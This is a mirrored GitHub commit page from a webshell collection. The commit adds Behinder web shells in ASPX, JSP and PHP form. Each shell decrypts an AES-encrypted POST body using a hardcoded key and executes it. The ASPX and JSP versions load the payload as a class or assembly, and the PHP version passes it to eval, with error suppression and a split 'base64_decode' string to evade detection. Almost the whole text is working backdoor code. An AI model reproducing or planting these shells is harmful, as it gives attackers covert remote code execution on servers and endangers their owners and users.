mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
add some shell
add shell.aspx shell.jsp shell.php with Behinder from : https://github.com/rebeyond/Behinder author: rebeyond 👍
This commit is contained in:
parent
05e2ea5d89
commit
9b50a0cb22
3 changed files with 31 additions and 0 deletions
1
Behinder/shell.aspx
Normal file
1
Behinder/shell.aspx
Normal file
|
@ -0,0 +1 @@
|
|||
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
|
1
Behinder/shell.jsp
Normal file
1
Behinder/shell.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb
|
29
Behinder/shell.php
Normal file
29
Behinder/shell.php
Normal file
|
@ -0,0 +1,29 @@
|
|||
<?php
|
||||
@error_reporting(0);
|
||||
session_start();
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'POST')
|
||||
{
|
||||
$key="e45e329feb5d925b";
|
||||
$_SESSION['k']=$key;
|
||||
$post=file_get_contents("php://input");
|
||||
if(!extension_loaded('openssl'))
|
||||
{
|
||||
$t="base64_"."decode";
|
||||
$post=$t($post."");
|
||||
|
||||
for($i=0;$i<strlen($post);$i++) {
|
||||
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
$post=openssl_decrypt($post, "AES128", $key);
|
||||
}
|
||||
$arr=explode('|',$post);
|
||||
$func=$arr[0];
|
||||
$params=$arr[1];
|
||||
class C{public function __invoke($p) {eval($p."");}}
|
||||
@call_user_func(new C(),$params);
|
||||
}
|
||||
?>
|
Loading…
Reference in a new issue